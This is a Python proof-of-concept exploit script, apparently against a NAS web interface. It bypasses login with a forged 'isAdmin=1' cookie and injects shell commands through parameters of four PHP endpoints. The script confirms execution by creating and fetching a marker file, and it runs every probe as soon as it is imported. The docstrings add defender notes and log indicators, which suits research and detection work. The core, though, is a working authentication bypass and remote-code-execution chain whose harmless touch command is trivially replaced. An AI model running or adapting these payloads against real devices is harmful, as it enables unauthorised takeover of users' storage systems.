import requests
import time
import inspect
import sys
# Host (name or IP) of the device under test; every request URL in this
# script is built as http://<mycloud_addr>/<path>.
mycloud_addr = "127.0.0.1"

# Static cookie attached to every request. The script never performs a login,
# so the requests rely on the target treating these client-supplied values as
# an administrator session (presumably without server-side validation --
# confirm against the vendor advisory). Server-side session state, not a
# client-set role cookie, is what the fix should key on.
headers = dict(Cookie="username=admin; isAdmin=1")

# When True, prepared requests are printed by dump_request() instead of sent.
dryrun = False
def dump_request(req):
    """Print a prepared request (method, URL, headers, body) to stdout.

    Used on the dry-run path so the exact request can be inspected without
    anything being sent to the device.

    req: a prepared request exposing ``method``, ``url``, ``headers`` and
    ``body`` attributes.
    """
    request_line = req.method + ' ' + req.url
    header_block = '\n'.join(
        '{}: {}'.format(k, v) for k, v in req.headers.items())
    # Single parenthesised argument: prints the same text under the Python 2
    # print statement and the Python 3 print function.
    print("{}\n{}\n{}\n\n{}".format(
        '-----------START-----------',
        request_line,
        header_block,
        req.body))
def gen_rce_test_file():
    """Return the marker-file path for one probe.

    The name embeds the current Unix time in whole seconds, so each probe is
    tied to a distinguishable file. For incident responders, files matching
    /var/www/fsociety_<epoch>.dat on a device are an artefact of this script.
    """
    epoch_seconds = int(time.time())
    return "/var/www/fsociety_%s.dat" % epoch_seconds
def verify_test_file(test_file):
    """Check over HTTP whether the marker file exists on the device.

    test_file: absolute marker path as produced by gen_rce_test_file(). The
    leading '/var/www/' is removed by length (the prefix itself is not
    checked) and the remainder is requested from the device.

    Prints a success line when the GET returns 200, a failure line otherwise.
    A 200 here means the marker was created, i.e. the request parameter was
    executed as a shell command on the device.
    """
    relative_path = test_file[len('/var/www/'):]
    test_endpoint = "http://%s/%s" % (mycloud_addr, relative_path)
    print("[+] Verify test file on %s" % test_endpoint)
    status = requests.get(test_endpoint).status_code
    if status != requests.codes.ok:
        print("[-] Failed to validate RCE")
        return
    print("[+] Successfully exploited RCE")
def do_post(endpoint, payload, test_file):
    """POST ``payload`` as form data to ``endpoint`` and check the marker.

    endpoint:  path on the device, appended to http://<mycloud_addr>/.
    payload:   dict of form fields.
    test_file: marker path handed to verify_test_file() after a 200 reply.

    With ``dryrun`` set, the prepared request is only printed.
    """
    url = "http://%s/%s" % (mycloud_addr, endpoint)
    prepared = requests.Request(
        "POST", url, headers=headers, data=payload).prepare()
    if dryrun:
        dump_request(prepared)
        return
    # NOTE(review): the page lost its indentation; the status check is placed
    # on the non-dry-run path because `resp` only exists there.
    resp = requests.Session().send(prepared)
    if resp.status_code != requests.codes.ok:
        print("[-] Failed to exploit RCE")
        return
    verify_test_file(test_file)
def do_get(endpoint, payload, test_file):
    """GET ``endpoint`` with ``payload`` as query parameters, then check.

    endpoint:  path on the device, appended to http://<mycloud_addr>/.
    payload:   dict of query-string parameters.
    test_file: marker path handed to verify_test_file() after a 200 reply.

    With ``dryrun`` set, the prepared request is only printed. Because the
    parameters travel in the URL, they would normally also show up in the
    device's web-server access log (assuming query strings are logged).
    """
    url = "http://%s/%s" % (mycloud_addr, endpoint)
    prepared = requests.Request(
        "GET", url, headers=headers, params=payload).prepare()
    if dryrun:
        dump_request(prepared)
        return
    # NOTE(review): the page lost its indentation; the status check is placed
    # on the non-dry-run path because `resp` only exists there.
    resp = requests.Session().send(prepared)
    if resp.status_code != requests.codes.ok:
        print("[-] Failed to exploit RCE")
        return
    verify_test_file(test_file)
def exploit_remote_backups():
    """Probe web/php/remoteBackups.php for command injection via ``jobName``.

    Sends cmd=getRecoverItems with a backtick-wrapped command in jobName. The
    command only creates an empty marker file (touch) and echoes "foo".

    Defender notes: if the marker appears, jobName reached a shell without
    escaping (presumably interpolated into a command string by the PHP
    handler). Backticks or ';' in jobName on POSTs to this endpoint are the
    request-side indicator; the fix is to validate the field and pass it
    through escapeshellarg() or avoid the shell entirely.
    """
    print("[+] Exploiting remote backups")
    marker = gen_rce_test_file()
    form_fields = {
        "cmd": "getRecoverItems",
        "jobName": "`touch %s; echo foo`" % marker,
    }
    do_post("web/php/remoteBackups.php", form_fields, marker)
def exploit_chk_vv_sharename():
    """Probe web/php/chk_vv_sharename.php via the ``vv_sharename`` parameter.

    Sends a GET whose vv_sharename value is a backtick-wrapped command that
    only creates an empty marker file (touch) and echoes "foo".

    Defender notes: the value is carried in the query string, so backticks in
    vv_sharename are the thing to search for in access logs (assuming query
    strings are logged). A share name has no legitimate need for shell
    metacharacters; the handler should reject them before any command runs.
    """
    print("[+] Exploiting chk_vv_sharename")
    marker = gen_rce_test_file()
    query = {"vv_sharename": "`touch %s; echo foo`" % marker}
    do_get("web/php/chk_vv_sharename.php", query, marker)
def exploit_raid_cgi():
    """Probe web/storage/raid_cgi.php via the ``run_cmd`` parameter.

    Sends cmd=cgi_Run_Smart_Test with run_cmd set to a plain ``touch`` of the
    marker file.

    Defender notes: no shell metacharacters are used here, which suggests the
    handler executes run_cmd as given (presumably -- confirm in the PHP
    source). The remedy is a fixed server-side command rather than one taken
    from the request.
    """
    print("[+] Exploiting raid cgi")
    marker = gen_rce_test_file()
    form_fields = {
        "cmd": "cgi_Run_Smart_Test",
        "run_cmd": "touch %s" % marker,
    }
    do_post("web/storage/raid_cgi.php", form_fields, marker)
def exploit_ganalytics():
    """Probe web/google_analytics.php via the ``arg`` parameter.

    Sends cmd=set, opt=pv-backups and an arg that starts with ';' followed by
    a ``touch`` of the marker file.

    Defender notes: the leading ';' is a shell command separator, so success
    implies arg is appended to a shell command line unescaped (presumably).
    A ';' in arg on POSTs to this endpoint is the request-side indicator.
    """
    print("[+] Exploiting ganalytics")
    marker = gen_rce_test_file()
    form_fields = {
        "cmd": "set",
        "opt": "pv-backups",
        "arg": "; touch %s" % marker,
    }
    do_post("web/google_analytics.php", form_fields, marker)
def all_exploits():
    """Return every function in this module whose name starts with 'exploit'.

    Discovery is by name only, via inspect.getmembers(), which yields members
    sorted by name; the result is therefore in alphabetical order, not in
    definition order.
    """
    this_module = sys.modules[__name__]
    found = []
    for name, obj in inspect.getmembers(this_module):
        if inspect.isfunction(obj) and name.startswith('exploit'):
            found.append(obj)
    return found
# Runs at import time: there is no __main__ guard, so merely importing this
# file sends every probe to mycloud_addr (or prints them when dryrun is set).
for f in all_exploits():
    f()
    # NOTE(review): indentation was lost on the page; the sleep is assumed to
    # sit inside the loop. Marker names use whole-second timestamps, so a
    # one-second gap keeps each probe's marker file distinct.
    time.sleep(1)